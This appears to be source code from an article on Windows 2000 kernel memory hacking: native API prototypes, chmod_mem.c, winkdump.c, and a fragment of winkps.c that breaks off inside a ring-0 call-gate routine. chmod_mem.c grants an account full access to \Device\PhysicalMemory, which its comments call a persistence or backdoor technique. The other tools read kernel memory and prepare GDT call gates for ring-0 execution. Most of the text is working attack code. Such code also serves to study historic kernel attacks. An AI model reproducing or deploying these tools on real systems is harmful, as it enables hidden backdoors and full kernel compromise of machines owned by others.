/*198*/ PVOID VadHint;
/*19C*/ PVOID CloneRoot;
/*1A0*/ DWORD NumberOfPrivatePages;
/*1A4*/ DWORD NumberOfLockedPages;
/*1A8*/ WORD NextPageColor;
/*1AA*/ BOOLEAN ExitProcessCalled;
/*1AB*/ BOOLEAN CreateProcessReported;
/*1AC*/ HANDLE SectionHandle;
/*1B0*/ PVOID Peb;
/*1B4*/ PVOID SectionBaseAddress;
/*1B8*/ PVOID QuotaBlock;
/*1BC*/ NTSTATUS LastThreadExitStatus;
/*1C0*/ DWORD WorkingSetWatch;
/*1C4*/ HANDLE Win32WindowStation;
/*1C8*/ DWORD InheritedFromUniqueProcessId;
/*1CC*/ ACCESS_MASK GrantedAccess;
/*1D0*/ DWORD DefaultHardErrorProcessing; // HEM_*
/*1D4*/ DWORD LdtInformation;
/*1D8*/ PVOID VadFreeHint;
/*1DC*/ DWORD VdmObjects;
/*1E0*/ PVOID DeviceMap;
/*1E4*/ DWORD SessionId;
/*1E8*/ LIST_ENTRY PhysicalVadList;
/*1F0*/ PVOID PageDirectoryPte;
/*1F4*/ DWORD dw1F4;
/*1F8*/ DWORD PaePageDirectoryPage;
/*1FC*/ CHAR ImageFileName[16];
/*20C*/ DWORD VmTrimFaultValue;
/*210*/ BYTE SetTimerResolution;
/*211*/ BYTE PriorityClass;
/*212*/ WORD SubSystemVersion;
/*214*/ PVOID Win32Process;
/*218*/ PVOID Job;
/*21C*/ DWORD JobStatus;
/*220*/ LIST_ENTRY JobLinks;
/*228*/ PVOID LockedPagesList;
/*22C*/ PVOID SecurityPort;
/*230*/ PVOID Wow64;
/*234*/ DWORD dw234;
/*238*/ IO_COUNTERS IoCounters;
/*268*/ DWORD CommitChargeLimit;
/*26C*/ DWORD CommitChargePeak;
/*270*/ LIST_ENTRY ThreadListHead;
/*278*/ PVOID VadPhysicalPagesBitMap;
/*27C*/ DWORD VadPhysicalPages;
/*280*/ DWORD AweLock;
/*284*/ } EPROCESS, *PEPROCESS;
// copy ntdll.lib from Microsoft DDK to current directory
// The tools in this article talk to the native API (the Nt* exports of
// ntdll.dll) directly instead of going through Win32, so they need the
// DDK import library and their own prototypes.
#pragma comment(lib, "ntdll")
// All native calls declared here return an NTSTATUS and use stdcall.  The
// callers in this file treat STATUS_SUCCESS (0) as the only success value
// and print anything else as an error code.
#define IMP_SYSCALL __declspec(dllimport) NTSTATUS _stdcall
// Map a view of a section into a process.  The callers here pass
// (HANDLE) -1 (the current process) as ProcessHandle and, for
// \Device\PhysicalMemory, a physical byte offset in *SectionOffset and
// PAGE_READONLY as Protect.  ViewSize is in/out: on return it holds the size
// the kernel actually mapped, which can be larger than the request.
IMP_SYSCALL
NtMapViewOfSection(HANDLE SectionHandle,
HANDLE ProcessHandle,
PVOID *BaseAddress,
ULONG ZeroBits,
ULONG CommitSize,
PLARGE_INTEGER SectionOffset,
PSIZE_T ViewSize,
SECTION_INHERIT InheritDisposition,
ULONG AllocationType,
ULONG Protect);
// Release a view created by NtMapViewOfSection; BaseAddress must be the
// value the mapping call returned.
IMP_SYSCALL
NtUnmapViewOfSection(HANDLE ProcessHandle,
PVOID BaseAddress);
// Open an existing section object by NT object path (e.g.
// \Device\PhysicalMemory, carried in ObjectAttributes).  Request the least
// access that does the job: SECTION_MAP_READ to read it,
// WRITE_DAC | READ_CONTROL to edit its security descriptor.
IMP_SYSCALL
NtOpenSection(PHANDLE SectionHandle,
ACCESS_MASK DesiredAccess,
POBJECT_ATTRIBUTES ObjectAttributes);
// Close any handle returned by the calls above.
IMP_SYSCALL
NtClose(HANDLE Handle);
// Create a symbolic link in the NT object namespace pointing at TargetName.
// Not used by the listings visible in this excerpt.
IMP_SYSCALL
NtCreateSymbolicLinkObject(PHANDLE SymLinkHandle,
ACCESS_MASK DesiredAccess,
POBJECT_ATTRIBUTES ObjectAttributes,
PUNICODE_STRING TargetName);
----[ 5.2 chmod_mem.c
#include <stdio.h>
#include <windows.h>
#include <aclapi.h>
#include "..\kmem.h"
// Print the command-line help to stdout and terminate the process.
// n: argv[0], the name the program was started with.  Never returns.
void usage(char *n) {
    fprintf(stdout, "usage: %s (/current | /user) [who]\n", n);
    puts("/current: add all access to current user");
    puts("/user : add all access to user 'who'");
    exit(0);
}
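// Append an "allow every section right" ACE for one account to the DACL of
// the \Device\PhysicalMemory section object.
//
//   chmod_mem /current       grant SECTION_ALL_ACCESS to the calling user
//   chmod_mem /user <who>    grant SECTION_ALL_ACCESS to account <who>
//
// Security impact (the whole point of the tool, so be explicit about it): an
// account that can map \Device\PhysicalMemory from user mode can read and,
// with write access, patch kernel memory from an ordinary process -- that is
// full control of the machine (see winkdump.c / winkps.c).  The ACE is put on
// the live kernel object and stays there as long as the object exists
// (presumably until reboot); this tool offers no undo.  Opening the section
// with WRITE_DAC is itself something only the object's owner or an
// administrator is expected to be able to do, so this is a persistence /
// backdoor technique rather than a privilege escalation.  Later Windows
// releases are understood to refuse user-mode handles to this object
// altogether; the listing targets Windows 2000.
//
// Exit status: 0 on success, 1 on any API failure (the failing call and its
// error code are printed).  Usage errors go through usage().
int main(int argc, char **argv) {
    HANDLE Section = NULL;                 // NULL so cleanup never closes garbage
    DWORD Res;
    NTSTATUS ntS;
    PACL OldDacl = NULL, NewDacl = NULL;   // NewDacl is allocated by SetEntriesInAcl
    PSECURITY_DESCRIPTOR SecDesc = NULL;   // allocated by GetSecurityInfo; OldDacl points into it
    EXPLICIT_ACCESS Access;
    OBJECT_ATTRIBUTES ObAttributes;
    INIT_UNICODE(ObName, L"\\Device\\PhysicalMemory");
    int mode = 0;                          // 1 = /current, 2 = /user <who>
    int rc = 1;

    if (argc < 2)
        usage(argv[0]);
    if (!strcmp(argv[1], "/current"))
        mode = 1;
    else if (!strcmp(argv[1], "/user") && argc == 3)
        mode = 2;
    else
        usage(argv[0]);                    // exits

    memset(&Access, 0, sizeof(Access));
    InitializeObjectAttributes(&ObAttributes, &ObName,
                               OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE,
                               NULL, NULL);

    // Open \Device\PhysicalMemory with only the rights needed to read and
    // rewrite its DACL; no mapping right is requested here.
    ntS = NtOpenSection(&Section, WRITE_DAC | READ_CONTROL, &ObAttributes);
    if (ntS != STATUS_SUCCESS) {
        printf("error: NtOpenSection (code: %lx)\n", (unsigned long) ntS);
        goto cleanup;
    }

    // Fetch the current DACL.  OldDacl points inside SecDesc, so SecDesc is
    // the only one of the two that gets freed.
    Res = GetSecurityInfo(Section, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION,
                          NULL, NULL, &OldDacl, NULL, &SecDesc);
    if (Res != ERROR_SUCCESS) {
        printf("error: GetSecurityInfo (code: %lu)\n", Res);
        goto cleanup;
    }

    // One explicit allow ACE granting every section right to the trustee.
    // TrusteeForm/TrusteeType can be changed to target a group or a SID
    // instead of an account name.
    Access.grfAccessPermissions = SECTION_ALL_ACCESS;
    Access.grfAccessMode = GRANT_ACCESS;
    Access.grfInheritance = NO_INHERITANCE;
    Access.Trustee.MultipleTrusteeOperation = NO_MULTIPLE_TRUSTEE;
    Access.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
    Access.Trustee.TrusteeType = TRUSTEE_IS_USER;
    // "CURRENT_USER" is a special trustee name the ACL API resolves to the
    // calling account; otherwise the name given on the command line is used.
    Access.Trustee.ptstrName = (mode == 1) ? "CURRENT_USER" : argv[2];

    // Merge the new ACE with the existing entries into a fresh ACL.
    Res = SetEntriesInAcl(1, &Access, OldDacl, &NewDacl);
    if (Res != ERROR_SUCCESS) {
        printf("error: SetEntriesInAcl (code: %lu)\n", Res);
        goto cleanup;
    }

    // Install the new DACL on the live object.
    Res = SetSecurityInfo(Section, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION,
                          NULL, NULL, NewDacl, NULL);
    if (Res != ERROR_SUCCESS) {
        // The original reported this as SetEntriesInAcl, which misdirects
        // anyone debugging a failure here.
        printf("error: SetSecurityInfo (code: %lu)\n", Res);
        goto cleanup;
    }
    printf("\\Device\\PhysicalMemory chmoded\n");
    rc = 0;

cleanup:
    if (NewDacl)
        LocalFree(NewDacl);                // was leaked before
    if (SecDesc)
        LocalFree(SecDesc);
    if (Section)
        NtClose(Section);
    return rc;
}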
----[ 5.3 winkdump.c
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include "..\kmem.h"
ULONG Granularity;
// thanx to kraken for the hexdump function
// Print `amount` bytes of `data` to stdout as a classic hex dump: 16 bytes
// per line, each byte as two hex digits plus a space, an extra space after
// the 8th byte, then "| " and the same bytes as ASCII (anything outside
// 0x20..0x7E shown as '.').  A trailing partial line is padded so the '|'
// column lines up.  The dump always ends with one extra "\n", which is a
// blank line when `amount` is a multiple of 16.  Nothing is returned.
void hexdump(unsigned char *data, unsigned int amount) {
    // Indexed by raw byte value: printable ASCII maps to itself, all else to '.'.
    static const char printable[] =
        "................................ !\"#$%&'()*+,-./0123456789"
        ":;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklm"
        "nopqrstuvwxyz{|}~...................................."
        "....................................................."
        "........................................";
    unsigned int lineStart;

    for (lineStart = 0; lineStart < amount; lineStart += 16) {
        unsigned int remaining = amount - lineStart;
        unsigned int lineLen = remaining < 16 ? remaining : 16;
        unsigned int i;

        // Hex column.
        for (i = 0; i < lineLen; i++) {
            printf("%02x ", data[lineStart + i]);
            if ((i + 1) % 8 == 0)
                printf(" ");
        }

        if (lineLen == 16) {
            printf("| ");
        } else {
            // Partial last line: pad each missing byte slot (three columns)
            // and the mid-line gap if the loop above never printed it, then
            // emit the separator with its own leading space.
            unsigned int missing = 16 - lineLen;
            for (i = missing; i > 0; i--) {
                printf("   ");
                if ((i % 8) == 0 && missing != 8)
                    printf(" ");
            }
            printf(" | ");
        }

        // ASCII column.
        for (i = 0; i < lineLen; i++)
            printf("%c", printable[data[lineStart + i]]);

        // A full line closes itself; the partial line is closed by the
        // final newline below.
        if (lineLen == 16)
            printf("\n");
    }
    printf("\n");
}
// "Translate" a 32-bit virtual address into the physical byte offset that
// winkdump hands to NtMapViewOfSection on \Device\PhysicalMemory.
//
// This is not a page-table walk.  Addresses in 0x80000000..0x9FFFFFFF are
// assumed to be the linearly mapped kernel window of (32-bit) Windows 2000,
// so their physical address is taken to be the virtual one with the top
// bits and the page offset stripped (& 0x1FFFF000).  Everything else only
// gets a 28-bit, page-aligned guess (& 0xFFFF000); for user-mode or high
// kernel addresses that result is generally meaningless and a mapping of it
// may fail or show unrelated memory.  Treat the result as a heuristic.
// Whether the kernel-window assumption survives PAE or later Windows
// versions is not established by this listing.
PHYSICAL_ADDRESS GetPhysicalAddress(ULONG vAddress) {
    PHYSICAL_ADDRESS phys;
    int inKernelWindow = (vAddress >= 0x80000000L && vAddress < 0xA0000000L);
    ULONG mask = inKernelWindow ? 0x1FFFF000 : 0xFFFF000;
    phys.QuadPart = (ULONGLONG) (vAddress & mask);
    return phys;
}
// Open \Device\PhysicalMemory for reading and store the handle in *Section.
// Only SECTION_MAP_READ is requested -- winkdump never writes, so this is
// the least privilege that works.  By default the section's DACL does not
// grant ordinary users this right (chmod_mem.c exists to change that).
// Returns 1 on success; on failure prints the NTSTATUS and returns 0, in
// which case *Section is not meaningful.
// NOTE(review): OBJ_KERNEL_HANDLE is passed from user mode here; the kernel
// is expected to ignore it for user-mode callers -- confirm, it is not
// something this code relies on.
int InitSection(PHANDLE Section) {
    OBJECT_ATTRIBUTES attrs;
    NTSTATUS status;
    INIT_UNICODE(devName, L"\\Device\\PhysicalMemory");

    InitializeObjectAttributes(&attrs, &devName,
                               OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE,
                               NULL, NULL);
    status = NtOpenSection(Section, SECTION_MAP_READ, &attrs);
    if (status == STATUS_SUCCESS)
        return 1;

    printf(" * error NtOpenSection (code: %x)\n", status);
    return 0;
}
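// Dump <size> bytes of the physical memory that GetPhysicalAddress() guesses
// lies behind virtual address <address>, by mapping \Device\PhysicalMemory
// read-only into this process.  Read-only throughout: SECTION_MAP_READ on
// the section (InitSection) and PAGE_READONLY on the view.  Needs an account
// with map-read access on the section (see chmod_mem.c).
//
// The virtual-to-physical step is a heuristic that is only meaningful for
// the 0x80000000..0x9FFFFFFF kernel window of Windows 2000; for other inputs
// the dump may be of unrelated memory, or the mapping may be refused.
//
// Exit status: 0 when the dump was printed, 1 on bad arguments or any error.
int main(int argc, char **argv) {
    NTSTATUS ntS;
    ULONG Address, Size, MappedSize, Offset;
    SIZE_T ViewSize;                    // in/out for NtMapViewOfSection; kept
                                        // separate so the kernel never writes
                                        // a SIZE_T into a ULONG
    HANDLE Section = NULL;
    PVOID MappedAddress = NULL;
    SYSTEM_INFO SysInfo;
    PHYSICAL_ADDRESS pAddress;
    char *end;
    int rc = 1;

    printf(" *** win2k memory dumper ***\n\n");
    if (argc != 3) {
        printf("usage: %s <address> <size>\n", argv[0]);
        return 1;
    }

    // Base 0 accepts 0x..., octal and decimal.  Reject trailing garbage:
    // strtoul returns 0 for a non-number, which would silently dump
    // address 0 / size 0 instead of failing.
    Address = strtoul(argv[1], &end, 0);
    if (end == argv[1] || *end != '\0') {
        printf("error: invalid address '%s'\n", argv[1]);
        return 1;
    }
    Size = strtoul(argv[2], &end, 10);
    if (end == argv[2] || *end != '\0' || !Size) {
        printf("error: invalid size\n");
        return 1;
    }
    printf(" Virtual Address : 0x%.8x\n", Address);

    // Views must start on an allocation-granularity boundary, so the view
    // starts at the boundary below Address and the dump skips Offset bytes.
    GetSystemInfo(&SysInfo);
    Granularity = SysInfo.dwAllocationGranularity;
    printf(" Allocation granularity: %lu bytes\n", Granularity);

    if (!InitSection(&Section))
        return 1;

    Offset = Address % Granularity;
    if (Size > ~(ULONG) 0 - Offset) {   // MappedSize would wrap -> short view
        printf("error: size too large\n");
        goto cleanup;
    }
    MappedSize = Size + Offset;
    printf(" Offset : 0x%x\n", Offset);

    pAddress = GetPhysicalAddress(Address - Offset);
    // PHYSICAL_ADDRESS is 64-bit: print both halves instead of passing the
    // whole union to a 32-bit %x conversion (undefined, and it dropped the
    // high part).
    printf(" Physical Address : 0x%.8lx%.8lx\n",
           (unsigned long) pAddress.HighPart, (unsigned long) pAddress.LowPart);

    ViewSize = MappedSize;
    ntS = NtMapViewOfSection(Section, (HANDLE) -1, &MappedAddress, 0L,
                             MappedSize, &pAddress, &ViewSize, ViewShare,
                             0, PAGE_READONLY);
    printf(" Mapped size : %lu bytes\n", (unsigned long) ViewSize);
    printf(" View size : %lu bytes\n\n", Size);
    if (ntS != STATUS_SUCCESS) {
        // 0xC00000F4 is STATUS_INVALID_PARAMETER_6, i.e. the kernel rejected
        // the 6th argument (SectionOffset): the guessed physical address is
        // not one it will map.
        if (ntS == 0xC00000F4L)
            printf("error: invalid physical address translation\n");
        else
            printf("error: NtMapViewOfSection (code: %x)\n", ntS);
        goto cleanup;
    }

    // Never read past what the kernel says it mapped, even if that were
    // smaller than what was asked for.
    if (ViewSize < Offset || ViewSize - Offset < Size) {
        printf("error: view smaller than requested\n");
    } else {
        hexdump((unsigned char *) MappedAddress + Offset, Size);
        rc = 0;
    }
    NtUnmapViewOfSection((HANDLE) -1, MappedAddress);

cleanup:
    NtClose(Section);
    return rc;
}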
----[ 5.4 winkps.c
// code very messy but working :)
#include <stdio.h>
#include <windows.h>
#include "..\kmem.h"
// get this address from win2k symbols
// PsActiveProcessHead is build-specific: the value below is only valid for
// the exact ntoskrnl build it was taken from.  With a wrong value the list
// walk reads garbage through the physical-memory mapping (hence MAX_PROCESS).
#define PSADD 0x8046A180 // PsActiveProcessHead
// default base address for ntoskrnl.exe on win2k
// NOTE(review): 0x7FFE0000 does not look like an ntoskrnl image base (win2k
// normally loads the kernel around 0x80400000); it is the usual user-mode
// address of KUSER_SHARED_DATA.  How BASEADD is used to locate
// MmGetPhysicalAddress is outside this excerpt -- confirm against the rest
// of winkps.c before trusting the comment above.
#define BASEADD 0x7FFE0000 // MmGetPhysicalAddress
// max process, to prevent easy crashing
// Presumably caps the number of list entries visited, so a corrupt or
// mis-translated list cannot run off into unmapped memory.
#define MAX_PROCESS 50
// State of the GDT page winkps maps through \Device\PhysicalMemory, presumably
// to plant a call gate that enters Ring0Func.  Field meanings below are
// inferred from the names; the code that fills them is outside this excerpt
// -- confirm against the rest of winkps.c.
typedef struct _MY_CG {
PHYSICAL_ADDRESS pAddress;      // physical address of the mapped GDT page (presumably)
PVOID MappedAddress;            // user-mode view of that page
PCALLGATE_DESCRIPTOR Desc;      // descriptor slot used for the call gate (presumably)
WORD Segment;                   // selector that refers to that slot (presumably)
WORD LastEntry;                 // last GDT entry in use, i.e. where the gate goes (presumably)
} MY_CG, *PMY_CG;
ULONG Granularity;              // allocation granularity, presumably from GetSystemInfo as in winkdump.c
// Kernel address of PsActiveProcessHead, head of the EPROCESS list winkps
// walks.  Hard-coded for one win2k build via PSADD; see the note there.
PLIST_ENTRY PsActiveProcessHead = (PLIST_ENTRY) PSADD;
MY_CG GdtMap;                   // mapped GDT / call-gate state
MAPPING CurMap;                 // current physical-memory view (MAPPING is declared in kmem.h, presumably)
// Resolved at run time; the prototype mirrors the kernel's MmGetPhysicalAddress.
// Presumably called from ring 0 inside Ring0Func -- the rest of winkps.c decides.
PHYSICAL_ADDRESS (*MmGetPhysicalAddress) (PVOID BaseAddress);
void __declspec(naked) Ring0Func() {
_asm {
pushad
pushf
cli